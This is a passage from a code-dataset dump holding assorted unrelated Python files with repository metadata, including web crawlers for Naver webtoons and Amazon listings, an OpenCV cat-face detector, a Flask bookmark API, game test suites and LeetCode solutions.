\"\"\"\n if self._X is None:\n raise ValueError(\"Embedding not learned yet\")\n return self._X\n\n def get_reconstructed_adj(self, X=None, node_l=None):\n \"\"\"Compute the adjacency matrix from the learned embedding\n\n Returns:\n A numpy array of size #nodes * #nodes containing the reconstructed adjacency matrix.\n \"\"\"\n if X is not None:\n node_num = X.shape[0]\n self._X = X\n else:\n node_num = self._node_num\n adj_mtx_r = np.zeros((node_num, node_num))\n for v_i in range(node_num):\n for v_j in range(node_num):\n if v_i == v_j:\n continue\n adj_mtx_r[v_i, v_j] = self.get_edge_weight(v_i, v_j)\n return adj_mtx_r\n\n @abstractmethod\n def learn_embedding(self, graph):\n \"\"\"Learning the graph embedding from the adjcency matrix.\n\n Args:\n graph: the graph to embed in networkx DiGraph format\n \"\"\"\n\n @abstractmethod\n def get_edge_weight(self, i, j):\n \"\"\"Compute the weight for edge between node i and node j\n\n Args:\n i, j: two node id in the graph for embedding\n Returns:\n A single number represent the weight of edge between node i and node j\n\n \"\"\"","repo_name":"palash1992/GEM","sub_path":"gem/embedding/static_graph_embedding.py","file_name":"static_graph_embedding.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":1254,"dataset":"github-code","pt":"81"} +{"seq_id":"70025048906","text":"import os\nfrom urllib import parse\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Webtoon:\n def __init__(self, webtoon_id):\n self.webtoon_id = webtoon_id\n self.title = None\n self.author = None\n self.description = None\n self.no = None\n self.num_of_episodes = None\n self.episode_list = list()\n self.html = ''\n self.number_pages = None\n\n def get_html(self, number_page=None):\n if number_page is None:\n number_page = 1\n\n # print(f'get_html함수가 실행됨..페이지{number_page}', self.webtoon_id)\n file_path = f'data/webtoon-{self.webtoon_id}-{number_page}.html'\n address = 'https://comic.naver.com/webtoon/list.nhn?'\n params = {\n 'titleId': self.webtoon_id,\n 'page':number_page,\n }\n if os.path.exists(file_path):\n html = open(file_path, 'rt').read()\n else:\n response = requests.get(address, params)\n html = response.text\n open(file_path, 'wt').write(html)\n self.html = html\n return self.html\n\n def set_info(self):\n # print(f'set_info가 실행됨')\n html = self.html\n soup = BeautifulSoup(html, 'lxml')\n div_detail = soup.select_one('div.detail')\n self.title = div_detail.select_one('h2').contents[0].strip()\n self.author = div_detail.select_one('h2 > span.wrt_nm').contents[0].strip()\n self.description = div_detail.select_one('p').get_text(strip=True, separator='\\n')\n self.number_pages = soup.select('div.page_wrap > a.page')[-1].get_text()\n\n html = self.html\n soup = BeautifulSoup(html, 'lxml')\n tr_list = soup.select_one('table.viewList').select('tr')\n episode_list = list()\n for index, tr in enumerate(tr_list[1:]):\n if tr.get('class'):\n continue\n from urllib import parse\n url_detail = tr.select_one('td:nth-of-type(1) > a').get('href')\n query_string = parse.urlsplit(url_detail).query\n query_dict = parse.parse_qs(query_string)\n self.no = query_dict['no'][0]\n episode_list.append(self.no)\n\n self.num_of_episodes = episode_list[0]\n\n\n def crawl_episode_list(self):\n\n episode_list = list()\n for number in range(1, int(self.number_pages)+1):\n self.get_html(number)\n soup = BeautifulSoup(self.html, 'lxml')\n table = soup.select_one('table.viewList')\n tr_list = table.select('tr')\n for index, tr in enumerate(tr_list[1:]):\n if tr.get('class'):\n continue\n url_detail = 'https://comic.naver.com'+tr.select_one('td:nth-of-type(1) > a').get('href')\n title = tr.select_one('td:nth-of-type(2) > a').get_text(strip=True)\n from urllib import parse\n query_string = parse.urlsplit(url_detail).query\n query_dict = parse.parse_qs(query_string)\n episode_no = query_dict['no'][0]\n new_episode = Episode(\n webtoon=self,\n title = title,\n url = url_detail,\n episode_no = episode_no\n )\n episode_list.append(new_episode)\n return episode_list\n\n\nclass Episode:\n def __init__(self, webtoon, title, url, episode_no):\n self.webtoon = webtoon\n self.title = title\n self.url = url\n self.episode_no = episode_no\n\n def __repr__(self):\n return f'{self.title}'\n\n def get_image_url_list(self):\n file_path = 'data/episode_detail-{webtoon_id}-{episode_no}.html'.format(\n webtoon_id=self.webtoon.webtoon_id,\n episode_no=self.episode_no,\n )\n # print('file_path:', file_path)\n # print(self.url)\n # 위 파일이 있는지 검사\n if os.path.exists(file_path):\n # print('os.path.exists: True')\n # 있다면 읽어온 결과를 html변수에 할당\n html = open(file_path, 'rt').read()\n else:\n # 없다면 self.url에 requests를 사용해서 요청\n # 요청의 결과를 html변수에 할당\n # 요청의 결과를 file_path에 해당하는 파일에 기록\n # print('os.path.exists: False')\n # print(' http get request, url:', self.url)\n response = requests.get(self.url)\n html = response.text\n open(file_path, 'wt').write(html)\n soup = BeautifulSoup(html, 'lxml')\n img_list = soup.select('div.wt_viewer > img')\n\n # episode_image = EpisodeImage(self.webtoon, self.title, img_list)\n\n return [img.get('src') for img in img_list]\n\n\n def download_all_images(self):\n for url in self.get_image_url_list():\n self.download(url)\n print(f'{self} 저장 완료')\n\n def download(self, url_img):\n \"\"\"\n :param url_img: 실제 이미지의 URL\n :return:\n \"\"\"\n # 서버에서 거부하지 않도록 HTTP헤더 중 'Referer'항목을 채워서 요청\n url_referer = f'http://comic.naver.com/webtoon/list.nhn?titleId={self.webtoon.webtoon_id}'\n headers = {\n 'Referer': url_referer,\n }\n response = requests.get(url_img, headers=headers)\n\n # 이미지 URL에서 이미지명을 가져옴\n file_name = url_img.rsplit('/', 1)[-1]\n\n # 이미지가 저장될 폴더 경로, 폴더가 없으면 생성해준다\n dir_path = f'data/{self.webtoon.webtoon_id}/{self.episode_no}'\n os.makedirs(dir_path, exist_ok=True)\n\n # 이미지가 저장될 파일 경로, 'wb'모드로 열어 이진데이터를 기록한다\n file_path = f'{dir_path}/{file_name}'\n open(file_path, 'wb').write(response.content)\n\n\n\n\n\n\n\n\n","repo_name":"Chrisaor/naver_webtoon_crawler","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7816719846","text":"\"\"\"\r\n이름 : 박민지\r\n날짜 : 2021/04/14\r\n내용 : 파이썬 외부 패키지 설치, 특수파일 실습 교재 p239\r\n\"\"\"\r\nfrom openpyxl import Workbook\r\nimport pandas as pd\r\n\r\n# Excel 파일 읽기\r\nexam = pd.read_excel('./data/exam.xlsx')\r\nprint(exam)\r\n\r\n# Excel 파일쓰기\r\n# 새로운 엑셀파일 생성\r\nworkbook = Workbook()\r\n\r\n# 현재 sheet 활성화\r\nsheet = workbook.active\r\n\r\n# 데이터 입력\r\nsheet['A1'] = 'A1셀'\r\nsheet.append([1, 2, 3])\r\nsheet.append(['김유신', '김춘추', '장보고', '강감찬', '이순신'])\r\nsheet.cell(5, 5, '5x5 데이터')\r\nsheet.cell(6, 2, '6x2 데이터')\r\n\r\n# 파일 저장/닫기\r\nworkbook.save('C:/Users/501/Desktop/Sample.xlsx')\r\nworkbook.close()\r\n\r\nprint('Excel 파일생성 완료')","repo_name":"min0201ji/Pyhthon_Programming_Basic","sub_path":"Ch08/8_3_Excel.py","file_name":"8_3_Excel.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72393365386","text":"# import requests\n\n# url = \"https://m.media-amazon.com/images/I/81vDZyJQ-4L._AC_UY218_.jpg\"\n# response = requests.get(url)\n\n# with open(\"image.jpg\", \"wb\") as f:\n# f.write(response.content)\nimport requests\nfrom bs4 import BeautifulSoup\nimport random\nimport time\n\n# list of user agents to randomly choose from\nuser_agents = [\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\"\n]\n\nbrands = ['Samsung', 'Apple', 'OnePlus', 'Xiaomi'] # list of brands to search\nmodel_ram_rom = {'Samsung Galaxy S21': {'ram': None, 'rom': None},\n 'iPhone 12': {'ram': None, 'rom': None},\n 'OnePlus 9 Pro': {'ram': None, 'rom': None},\n 'Xiaomi Mi 11': {'ram': None, 'rom': None}} # dictionary of model names and RAM/ROM details\nmobile_data = [] # list to store the scraped mobile data\n\nfor brand in brands:\n url = f'https://www.amazon.com/s?k={brand}+mobile'\n headers = {'User-Agent': random.choice(user_agents)} # randomly choose a user agent\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n results = soup.find_all('div', {'data-component-type': 's-search-result'})\n\n for r in results:\n title = r.find('h2').text.strip()\n price = r.find('span', {'class': 'a-offscreen'})\n if price:\n price = price.text\n else:\n price = 'Price not available'\n rating = r.find('span', {'class': 'a-icon-alt'})\n if rating:\n rating = rating.text\n else:\n rating = 'No rating available'\n \n # check if the current mobile is one of the specified models\n for model in model_ram_rom:\n if model in title:\n ram_rom = r.find('span', {'class': 'a-size-base-plus a-color-secondary a-text-normal'})\n if ram_rom:\n ram_rom = ram_rom.text.strip().split('|')\n model_ram_rom[model]['ram'] = ram_rom[0].strip()\n model_ram_rom[model]['rom'] = ram_rom[1].strip()\n else:\n model_ram_rom[model]['ram'] = 'RAM not available'\n model_ram_rom[model]['rom'] = 'ROM'\n\nprint(mobile_data)\nprint(model_ram_rom)\n","repo_name":"Arunganesh02/E-commerce_website","sub_path":"beautiful.py","file_name":"beautiful.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"1332544707","text":"from functools import partial\nfrom random import random\nfrom threading import Thread\nimport time\nimport pandas as pd\n\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.plotting import curdoc, figure, show\n\nfrom tornado import gen\n\nnew_data = {\n 'x' : [0, 1.5, 2.5, 3.5, 4.5],\n 'y' : [0, 10, 20, 30, 40],\n #'z': [0, 1*random(), 2*random(), 3*random(), 4*random()],\n }\ndf = pd.DataFrame(new_data)\nfor c in df.keys():\n d = df[c]\n\n\"\"\"\ndata = {'x_values': [1, 2, 3, 4, 5],\n 'y_values': [6, 7, 2, 3, 6]}\n# this must only be modified from a Bokeh session callback\nsource = ColumnDataSource(data=dict(x=[0], y=[0]))\nsource.add([11, 22, 33, 44, 55], 'y_1_values')\n\np = figure()\np.circle(x='x_values', y='y_values', source=source)\n\"\"\"\nnew_data = {\n 'x' : [0, 2, 2.1, 3, 4],\n 'y' : [0, 1, 2, 3, 4],\n #'z': [0, 1*random(), 2*random(), 3*random(), 4*random()],\n }\ndf = pd.DataFrame(new_data)\n\ndoc = curdoc()\nsource = ColumnDataSource(data=dict(x=[0], y=[0]))\n\n@gen.coroutine\ndef update(x,y):\n for c in df.keys():\n d = df[c]\n print('d is:', d)\n source.stream(x, y)\n\ndef blocking_task():\n while True:\n # do some blocking computation\n time.sleep(0.1)\n #new_data = {\n # 'x' : [0, 1.5, 2.5, 3.5, 4.5],\n # 'y' : [0, 10, 20, 30, 40],\n #}\n #df = pd.DataFrame(new_data)\n x = 3\n y = 3\n\n doc.add_next_tick_callback(partial(update, x, y))\n\np = figure(x_range = [0,10], y_range = [0,50])\nl = p.circle(x='x', y='y', source=source)\ndoc.add_root(p)\nshow(p)\n\nthread = Thread(target=blocking_task)\nthread.start()\n","repo_name":"ZviBaratz/flics-app-bak","sub_path":"app/analysis/testapp.py","file_name":"testapp.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12480012303","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateTimeField(default=datetime.datetime(2016, 2, 13, 6, 6, 51, 11682, tzinfo=utc))),\n ('category', models.CharField(default=b'NE', max_length=2, choices=[(b'NE', b'News'), (b'EV', b'Events'), (b'RU', b'Results'), (b'RO', b'Resources')])),\n ('title', models.CharField(max_length=128)),\n ('body', models.TextField()),\n ('feature', models.BooleanField(default=True)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"benjiboi214/mmpl","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38221606847","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: cats_detector.py\n# Author: lxw\n# Date: 2/28/18 10:44 PM\n\n\"\"\"\nReferences:\n1. [Detecting cats in images with OpenCV](https://www.pyimagesearch.com/2016/06/20/detecting-cats-in-images-with-opencv/)\n2. [Good posts on OpenCV](https://www.pyimagesearch.com/done/)\n\"\"\"\n\ndef main():\n import argparse\n import cv2\n\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--image\", required=True, help=\"path to the input image\")\n ap.add_argument(\"-c\", \"--cascade\", default=\"../data/input/haarcascade_frontalcatface.xml\", help=\"path to cat detector haar cascade\")\n args = vars(ap.parse_args()) # \n\n # load the input image and convert it to grayscale\n image = cv2.imread(args[\"image\"])\n gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # cv2.imshow(\"Gray Cat Faces\", gray_img)\n\n # load the cat detector Haar cascade, then detect cat faces in the input image\n detector = cv2.CascadeClassifier(args[\"cascade\"])\n rects = detector.detectMultiScale(gray_img, scaleFactor=1.3, minNeighbors=10, minSize=(75, 75)) # a list of 4-tuples\n\n # loop over the cat faces and draw a rectangle surrounding each\n # for (i, (x, y, w, h)) in enumerate(rects):\n for i, (x, y, w, h) in enumerate(rects):\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv2.putText(image, \"Cat #{}\".format(i + 1), (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.55, (0, 0, 255), 2)\n\n # show the detected cat faces\n cv2.imshow(\"Cat Faces\", image)\n cv2.waitKey(0)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"lxw0109/ML-Experiments","sub_path":"CAPTCHA/OpenCV_Demo/src/cats_detector.py","file_name":"cats_detector.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"72071750665","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root: return []\n ans = []\n\n stack = [root]\n while stack:\n new_stack = []\n layer = []\n for n in stack:\n layer.append(n.val)\n if n.left: new_stack.append(n.left)\n if n.right: new_stack.append(n.right)\n stack = new_stack\n ans.append(layer)\n \n return ans\n","repo_name":"CastleWhite/LeetCodeProblems","sub_path":"102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"29930752633","text":"import unittest\n\nimport numpy as np\nimport pygame\n\nfrom ...controls.controllers import Passive\nfrom ...data.component import Component\nfrom ...data.gatherer import Gatherer\nfrom ...data.routines import ThoroughRoutine, RandomRoutine\nfrom ...examples.lazerbike.builder import create_game\nfrom ...examples.lazerbike.gamedata import GO_UP, GO_DOWN, GO_LEFT, GO_RIGHT\n\n\nclass TestLazerbikeData(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n pygame.init()\n\n players_positions = {1: (0, 0, GO_RIGHT), 2: (2, 2, GO_LEFT)}\n\n cls.loop = create_game(({1: Passive, 2: Passive}, {1: 1, 2: 2}), lines=3, columns=3,\n init_positions=players_positions, speed=200)\n\n a_priori_methods = [lambda api: api.getPlayerLocation(1)[0], lambda api: api.getPlayerLocation(1)[1],\n lambda api: api.getCurrentDirection(1),\n lambda api: api.getPlayerLocation(2)[0], lambda api: api.getPlayerLocation(2)[1],\n lambda api: api.getCurrentDirection(2)]\n a_priori_title = [\"location_x\", \"location_y\", \"direction\", \"opponent_x\", \"opponent_y\", \"opponent_direction\"]\n a_posteriori_methods = [lambda api: 1000 if api.hasWon(1) else 0]\n a_posteriori_titles = [\"final_points\"]\n a_priori_components = []\n a_posteriori_components = []\n for i in range(len(a_priori_methods)):\n a_priori_components.append(Component(a_priori_methods[i], a_priori_title[i]))\n for i in range(len(a_posteriori_methods)):\n a_posteriori_components.append(Component(a_posteriori_methods[i], a_posteriori_titles[i]))\n cls.gatherer = Gatherer(a_priori_components, a_posteriori_components)\n cls.routine = ThoroughRoutine(cls.gatherer, (GO_UP, GO_LEFT, GO_RIGHT, GO_DOWN),\n lambda api: {player: 100 * api.hasWon(player) for player in (1, 2)},\n must_keep_temp_files=True, must_write_files=True)\n cls.api = cls.loop.api\n\n def test_gathering_possibility_to_win_in_one_turn(self):\n found = False\n i = 0\n self.a_priori_data, self.a_posteriori_dict = self.routine.routine(1, self.api)\n for i in range(len(self.a_priori_data)):\n if (self.a_priori_data.take((i,)) == np.array([1, 1, 0, 0, 2, 1])).all().all():\n found = True\n break\n if not found:\n self.assertTrue(False)\n else:\n self.assertListEqual(self.a_posteriori_dict[3].take((i,)).get_values().ravel().tolist(), [0., 1., 1.])\n\n def test_gathering_no_way_out(self):\n found = False\n i = 0\n self.a_priori_data, self.a_posteriori_dict = self.routine.routine(1, self.api)\n for i in range(len(self.a_priori_data)):\n if (self.a_priori_data.take((i,)) == np.array([2, 0, 3, 1, 1, 2])).all().all():\n found = True\n break\n if not found:\n self.assertTrue(False)\n else:\n self.assertListEqual(self.a_posteriori_dict[0].take((i,)).get_values().ravel().tolist(), [0., -1., 1.])\n\n def test_gathering_limited_number(self):\n routine = ThoroughRoutine(self.gatherer, (GO_UP, GO_LEFT, GO_RIGHT, GO_DOWN),\n lambda api: {player: 100*api.hasWon(player) for player in (1, 2)},\n must_keep_temp_files=False, must_write_files=False, max_end_states=2)\n a_priori_data, a_posteriori_dict = routine.routine(1, self.api.copy())\n self.assertEqual(len(routine._actionsSequences), 2 * routine._maxEndStates) # 2 players\n\n\nclass TestLazerbikeRandomData(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n pygame.init()\n\n cls.loop = create_game(({1: Passive, 2: Passive}, {1: 1, 2: 2}))\n\n a_priori_methods = [lambda api: api.getPlayerLocation(1)[0], lambda api: api.getPlayerLocation(1)[1],\n lambda api: api.getCurrentDirection(1),\n lambda api: api.getPlayerLocation(2)[0], lambda api: api.getPlayerLocation(2)[1],\n lambda api: api.getCurrentDirection(2)]\n a_priori_title = [\"location_x\", \"location_y\", \"direction\", \"opponent_x\", \"opponent_y\", \"opponent_direction\"]\n a_posteriori_methods = [lambda api: 1000 if api.hasWon(1) else 0]\n a_posteriori_titles = [\"final_points\"]\n a_priori_components = []\n a_posteriori_components = []\n for i in range(len(a_priori_methods)):\n a_priori_components.append(Component(a_priori_methods[i], a_priori_title[i]))\n for i in range(len(a_posteriori_methods)):\n a_posteriori_components.append(Component(a_posteriori_methods[i], a_posteriori_titles[i]))\n cls.gatherer = Gatherer(a_priori_components, a_posteriori_components)\n cls.routine = RandomRoutine(cls.gatherer, (GO_UP, GO_LEFT, GO_RIGHT, GO_DOWN),\n lambda api: {player: 100 * api.hasWon(player) for player in (1, 2)},\n 1, 10, max_end_states=100, must_keep_temp_files=False, must_write_files=False)\n cls.api = cls.loop.api\n\n def test_actions(self):\n res = None\n beginning_api = self.api.copy()\n while res is None:\n res = self.routine.routine(1, beginning_api.copy())\n for i in range(0, res.shape[0], 2):\n api = beginning_api.copy()\n line = [int(res.loc[i][k]) for k in range(len(res.loc[i])) if res.loc[i][k] == res.loc[i][k]]\n line2 = [int(res.loc[i+1][k]) for k in range(len(res.loc[i+1])) if res.loc[i+1][k] == res.loc[i+1][k]]\n self.assertEqual(len(line), len(line2))\n has_won = {1: bool(line[0]), 2: bool(line2[0])}\n line = line[1:]\n line2 = line2[1:]\n for j in range(len(line)):\n succeeded = api.performMove(1, api.decodeMove(1, line[j]))\n succeeded2 = api.performMove(2, api.decodeMove(2, line2[j]))\n self.assertTrue(succeeded2 and succeeded)\n self.assertTrue(api.isFinished())\n self.assertTrue(api.hasWon(1) == has_won[1])\n self.assertTrue(api.hasWon(2) == has_won[2])\n","repo_name":"Angeall/pyTGF","sub_path":"pytgf/test/test_data/test_lazerbike_data.py","file_name":"test_lazerbike_data.py","file_ext":"py","file_size_in_byte":6310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7661770385","text":"\nimport torch \nimport random\n\ndef randRGB(seed=None):\n if seed is not None:\n random.seed(seed)\n r = random.random()\n g = random.random()\n b = random.random()\n rgb = [r, g, b]\n return rgb\n\ndef apply_instance_masks(image, masks, confidence, device, ids=None):\n\n masks = masks.squeeze(1)\n \n background_mask = torch.zeros((1, *masks[0].shape), device=device)\n background_mask = background_mask.new_full(background_mask.shape, confidence)\n \n masks = torch.cat([background_mask, masks], dim=0)\n \n mask_argmax = torch.argmax(masks, dim=0)\n \n if ids is not None:\n mask = torch.tensor(background_mask, dtype=torch.long, device=device)\n for idx, obj_id in enumerate(ids):\n mask = torch.where((mask_argmax == idx + 1), obj_id, mask)\n else:\n mask = mask_argmax\n\n max_val = mask.max()\n\n for i in range(1, max_val + 1):\n for c in range(3):\n alpha = 0.45\n color = randRGB(i)\n image[c, :, :] = torch.where(mask == i,\n image[c, :, :] *\n (1 - alpha) + alpha * color[c],\n image[c, :, :])\n return image","repo_name":"juanb09111/semantic_depth","sub_path":"utils/apply_instance_mask.py","file_name":"apply_instance_mask.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"10482415616","text":"\"\"\"\nAPI endpoints for \"event bookmark\" package.\n\"\"\"\n\nfrom werkzeug.exceptions import Forbidden, HTTPException\nfrom flask import request, current_app, g\nfrom flask_restful import abort\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import load_only, joinedload\nfrom flasgger import swag_from\nfrom sqlalchemy.inspection import inspect\n\nfrom app import db, c_abort\nfrom app.base.api import AuthResource\nfrom app.resources.event_bookmarks.models import EventBookmark\nfrom app.resources.event_bookmarks.schemas import (\n EventBookmarkSchema, EventBookmarkReadArgsSchema)\nfrom app.resources.events.models import Event\nfrom app.resources.event_types.models import EventType\nfrom app.base import constants as APP\n\n\n# main schema for input and output\nevent_bookmark_schema = EventBookmarkSchema()\n# schema for reading get arguments\nevent_bookmark_read_schema = EventBookmarkReadArgsSchema(strict=True)\n\n\nclass EventBookmarkAPI(AuthResource):\n \"\"\"\n Create, delete, get API for event bookmark\n \"\"\"\n\n @swag_from('swagger_docs/event_bookmark_post.yml')\n def post(self):\n \"\"\"\n Create event bookmark\n \"\"\"\n json_data = request.get_json()\n if not json_data:\n c_abort(400)\n model = None\n try:\n # validate and deserialize input into object\n data, errors = event_bookmark_schema.load(json_data)\n if errors:\n c_abort(422, errors=errors)\n\n model = Event.query.filter(Event.row_id == data.event_id).first()\n if model is None or model.deleted:\n c_abort(404, message='Event id: %s does not exist' %\n str(data.event_id))\n\n data.created_by = g.current_user['row_id']\n data.account_id = g.current_user['account_id']\n\n db.session.add(data)\n db.session.commit()\n except HTTPException as e:\n raise e\n except IntegrityError as e:\n db.session.rollback()\n if APP.DB_ALREADY_EXISTS in e.orig.diag.message_detail.lower():\n # format of the message:\n # Key (created_by, event_id)=(2, 6) already exists.\n column = e.orig.diag.message_detail.split('(')[1][:-2]\n c_abort(422, message=APP.MSG_ALREADY_EXISTS, errors={\n column: [APP.MSG_ALREADY_EXISTS]})\n # for any other unknown db errors\n current_app.logger.exception(e)\n abort(500)\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {'message': 'EventBookmark added %s' % str(data.row_id),\n 'row_id': data.row_id}, 201\n\n @swag_from('swagger_docs/event_bookmark_delete.yml')\n def delete(self, row_id):\n \"\"\"\n Delete event bookmark by id\n \"\"\"\n model = None\n try:\n model = EventBookmark.query.get(row_id)\n if model is None:\n c_abort(404, message='EventBookmark id: %s does not exist' %\n str(row_id))\n if model.created_by != g.current_user['row_id']:\n c_abort(403)\n\n db.session.delete(model)\n db.session.commit()\n except Forbidden as e:\n raise e\n except HTTPException as e:\n raise e\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {}, 204\n\n @swag_from('swagger_docs/event_bookmark_get.yml')\n def get(self, row_id):\n \"\"\"\n Get event bookmark by id\n \"\"\"\n model = None\n try:\n model = EventBookmark.query.get(row_id)\n if model is None:\n c_abort(404, message='EventBookmark id: %s does not exist' %\n str(row_id))\n result = event_bookmark_schema.dump(model)\n except Forbidden as e:\n raise e\n except HTTPException as e:\n raise e\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {'results': result}, 200\n\n\nclass EventBookmarkListAPI(AuthResource):\n \"\"\"\n Read API for event bookmark lists, i.e, more than one\n \"\"\"\n\n model_class = EventBookmark\n\n def __init__(self, *args, **kwargs):\n super(EventBookmarkListAPI, self).__init__(*args, **kwargs)\n\n def build_query(self, filters, pfields, sort, pagination, query_session,\n operator, include_deleted=False):\n \"\"\"\n Builds the query by calling parent helpers _build_query,\n _build_final_query\n Also manages extra_filters (combined filters) here if any\n \"\"\"\n query_filters, extra_query, db_projection, s_projection, order, \\\n paging = self._build_query(\n filters, pfields, sort, pagination, operator,\n include_deleted=include_deleted)\n mapper = inspect(Event)\n # build specific extra queries filters\n if extra_query:\n for f in extra_query:\n # dates\n if f in ['start_date_from', 'start_date_to',\n 'end_date_from', 'end_date_to'] and extra_query[f]:\n # get actual field name\n fld = f.replace('_from', '').replace('_to', '')\n # build date query\n if '_from' in f:\n query_filters['filters'].append(\n mapper.columns[fld] >= filters[f])\n continue\n if '_to' in f:\n query_filters['filters'].append(\n mapper.columns[fld] <= filters[f])\n continue\n elif f == 'event_type':\n query_filters['filters'].append(\n EventType.name == extra_query[f])\n if sort:\n sort_fxn = 'asc'\n if sort['sort'] == 'dsc':\n sort_fxn = 'desc'\n for sby in sort['sort_by']:\n if sby in mapper.columns:\n order.append(getattr(mapper.columns[sby], sort_fxn)())\n\n if 'event_id' not in filters:\n query_filters['base'].append(\n EventBookmark.created_by == g.current_user['row_id'])\n\n query = self._build_final_query(query_filters, query_session, operator)\n query = query.join(Event).join(EventType)\n\n return query, db_projection, s_projection, order, paging\n\n @swag_from('swagger_docs/event_bookmark_get_list.yml')\n def get(self):\n \"\"\"\n Get the list\n \"\"\"\n models = []\n total = 0\n # parse the request query arguments\n filters, pfields, sort, pagination, operator = self.parse_args(\n event_bookmark_read_schema)\n try:\n # build the sql query\n query, db_projection, s_projection, order, paging = \\\n self.build_query(filters, pfields, sort, pagination,\n db.session.query(EventBookmark), operator)\n # making a copy of the main output schema\n event_bookmark_schema = EventBookmarkSchema()\n if db_projection:\n # change the query to include only requested fields\n query = query.options(load_only(*db_projection))\n if s_projection:\n # change the schema to include only requested fields\n event_bookmark_schema = EventBookmarkSchema(only=s_projection)\n # make query\n full_query = query.order_by(*order).paginate(\n paging['page'], paging['per_page'], error_out=False)\n # prepare models for output dump\n models = [m for m in full_query.items]\n total = full_query.total\n if not models:\n c_abort(404, message='No matching event bookmark found')\n result = event_bookmark_schema.dump(models, many=True)\n except HTTPException as e:\n raise e\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {'results': result.data, 'total': total}, 200\n","repo_name":"Witzcode0/Exchange-connect","sub_path":"app/resources/event_bookmarks/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31392183906","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeElements(self, head: Optional[ListNode], val: int) -> Optional[ListNode]:\n cur, prev = head, None\n while cur:\n if cur.val == val:\n if prev is None:\n head = head.next\n else:\n prev.next=cur.next\n else:\n prev=cur\n cur=cur.next\n return head","repo_name":"jitaeyun/algorithm","sub_path":"leetcode/Python/remove-linked-list-elements.py","file_name":"remove-linked-list-elements.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1039805630","text":"#%%\nimport argparse\nimport os\n\nfrom KGUnlearn import model_test\n\n#%%\nif __name__ == \"__main__\":\n pwd = os.getcwd()\n os.environ[\"LOG_DIR\"] = f\"{pwd}/logs\"\n os.environ[\"DATA_PATH\"] = f\"{pwd}/data\"\n args = argparse.Namespace(\n 